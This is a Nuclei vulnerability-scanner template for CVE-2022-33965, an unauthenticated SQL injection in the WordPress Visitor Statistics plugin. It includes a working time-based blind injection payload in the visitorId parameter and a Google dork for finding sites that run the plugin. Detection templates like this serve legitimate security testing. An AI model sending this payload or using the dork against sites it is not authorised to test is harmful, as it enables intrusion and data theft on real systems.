nuclei-templates/cves/2022/CVE-2022-33965.yaml

46 lines
1.5 KiB
YAML

id: CVE-2022-33965
info:
name: WordPress Visitor Statistics <=5.7 - SQL Injection
author: theamanrawat
severity: critical
description: |
WordPress Visitor Statistics plugin through 5.7 contains multiple unauthenticated SQL injection vulnerabilities. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://patchstack.com/database/vulnerability/wp-stats-manager/wordpress-wp-visitor-statistics-plugin-5-7-multiple-unauthenticated-sql-injection-sqli-vulnerabilities
- https://wordpress.org/plugins/wp-stats-manager/
- https://wordpress.org/plugins/wp-stats-manager/#developers
- https://nvd.nist.gov/vuln/detail/CVE-2022-33965
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-33965
cwe-id: CWE-89
metadata:
google-query: inurl:"/wp-content/plugins/wp-stats-manager"
verified: "true"
tags: cve,cve2022,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager
requests:
- raw:
- |
@timeout: 15s
GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(5)+or+' HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=5'
- type: regex
regex:
- "^1331' and sleep\\(5\\) or '$"
- type: status
status:
- 200
# Enhanced by md on 2022/12/13